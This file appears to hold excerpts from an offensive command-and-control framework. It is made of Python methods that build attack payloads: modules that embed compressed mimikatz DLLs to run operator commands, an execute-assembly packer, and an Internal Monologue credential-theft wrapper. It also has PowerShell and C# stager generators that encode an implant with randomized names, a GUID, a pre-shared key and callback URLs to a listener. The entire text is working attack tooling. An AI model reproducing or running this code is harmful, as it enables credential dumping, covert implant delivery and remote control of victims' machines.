def payload(self):
with open('core/teamserver/data/powerkatz_x86.dll', 'rb') as powerkatz_x86:
with open('core/teamserver/data/powerkatz_x64.dll', 'rb') as powerkatz_x64:
with open('core/teamserver/modules/boo/src/mimikatz.boo', 'r') as module_src:
src = module_src.read()
src = src.replace("COMPRESSED_PE_x86", dotnet_deflate_and_encode(powerkatz_x86.read()))
src = src.replace("COMPRESSED_PE_x64", dotnet_deflate_and_encode(powerkatz_x64.read()))
src = src.replace("MIMIKATZ_COMMAND", self.options['Command']['Value'])
return src
def payload(self):
with open('core/teamserver/modules/boo/src/execute-assembly.boo'
) as module:
module = module.read()
assembly_path = os.path.expanduser(
self.options['Assembly']['Value'])
if not os.path.exists(assembly_path):
raise Exception("Assembly not found in specified path")
assembly_size = os.path.getsize(assembly_path)
with open(assembly_path, 'rb') as assembly:
module = module.replace(
"B64_ENCODED_COMPRESSED_ASSEMBLY",
dotnet_deflate_and_encode(assembly.read()))
module = module.replace("DECOMPRESSED_ASSEMBLY_LENGTH",
str(assembly_size))
boolang_string_array = ''
if self.options['Arguments']['Value']:
formatted_arguments = r', '.join([
fr"`{arg}`"
for arg in split(self.options['Arguments']['Value'])
])
boolang_string_array = f"= array(string, ({formatted_arguments}))"
module = module.replace("ASSEMBLY_ARGS", boolang_string_array)
print(module)
return module
def payload(self):
with open('core/teamserver/data/internalmonologue.dll', 'rb') as dll:
with open('core/teamserver/modules/boo/src/internalmonologue.boo'
) as module_src:
src = module_src.read()
src = src.replace("INTERNAL_MONOLOGUE_DLL",
dotnet_deflate_and_encode(dll.read()))
src = src.replace(
"impersonate=",
f"impersonate={self.options['Impersonate']['Value']}".
lower())
src = src.replace(
"threads=",
f"threads={self.options['Threads']['Value']}".lower())
src = src.replace(
"downgrade=",
f"downgrade={self.options['Downgrade']['Value']}".lower())
src = src.replace(
"restore=",
f"restore={self.options['Restore']['Value']}".lower())
src = src.replace(
"challenge=",
f"challenge=\"{self.options['Challenge']['Value']}\"".
lower())
src = src.replace(
"verbose=",
f"verbose={self.options['Verbose']['Value']}".lower())
return src
def generate(self, listener):
with open('./core/teamserver/data/naga.exe', 'rb') as assembly:
with open(
'core/teamserver/stagers/templates/posh.ps1') as template:
template = template.read()
c2_url = f"{listener.name}://{listener['BindIP']}:{listener['Port']}"
if bool(self.options['AsFunction']['Value']) is True:
function_name = gen_random_string(6).upper()
template = f"""function Invoke-{function_name}
{{
[CmdletBinding()]
param (
[Parameter(Mandatory=$true)][String]$Url
)
{template}
}}
Invoke-{function_name} -Url "{c2_url}"
"""
else:
template = template.replace("$Url", f'"{c2_url}"')
assembly = assembly.read()
template = template.replace(
"BASE64_ENCODED_ASSEMBLY",
dotnet_deflate_and_encode(assembly))
template = template.replace("DATA_LENGTH", str(len(assembly)))
return template
def generate(self, listener):
with open('./core/teamserver/data/naga.exe', 'rb') as assembly:
with open('./core/teamserver/stagers/templates/csharp.cs'
) as template:
template = template.read()
template = template.replace("CLASS_NAME",
gen_random_string_no_digits(8))
template = template.replace(
'C2_URL',
f"{listener.name}://{listener['BindIP']}:{listener['Port']}"
)
template = template.replace(
"BASE64_ENCODED_ASSEMBLY",
dotnet_deflate_and_encode(assembly.read()))
return template
def generate(self, listener):
with open('./core/teamserver/data/naga.exe', 'rb') as assembly:
with open(
'core/teamserver/stagers/templates/posh.ps1') as template:
template = template.read()
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
guid = uuid.uuid4()
psk = gen_stager_psk()
if bool(self.options['AsFunction']['Value']) is True:
function_name = gen_random_string(6).upper()
template = f"""function Invoke-{function_name}
{{
[CmdletBinding()]
param (
[Parameter(Mandatory=$true)][String]$Guid,
[Parameter(Mandatory=$true)][String]$Psk,
[Parameter(Mandatory=$true)][String]$Url
)
{template}
}}
Invoke-{function_name} -Guid '{guid}' -Psk '{psk}' -Url '{c2_urls}'
"""
else:
template = template.replace("$Url", f'{c2_urls}')
template = template.replace("$Guid", f'{guid}')
template = template.replace("$Psk", f'{psk}')
assembly = assembly.read()
template = template.replace(
"BASE64_ENCODED_ASSEMBLY",
dotnet_deflate_and_encode(assembly))
template = template.replace("DATA_LENGTH", str(len(assembly)))
return guid, psk, template
def generate(self, listener):
with open('./core/teamserver/data/naga.exe', 'rb') as assembly:
with open('./core/teamserver/stagers/templates/csharp.cs'
) as template:
guid = uuid.uuid4()
psk = gen_stager_psk()
c2_urls = ','.join(
filter(None, [
f"{listener.name}://{listener['BindIP']}:{listener['Port']}",
listener['CallBackURls']
]))
template = template.read()
template = template.replace("CLASS_NAME",
gen_random_string_no_digits(8))
template = template.replace('GUID', str(guid))
template = template.replace('PSK', psk)
template = template.replace('URLS', c2_urls)
template = template.replace(
"BASE64_ENCODED_ASSEMBLY",
dotnet_deflate_and_encode(assembly.read()))
return guid, psk, template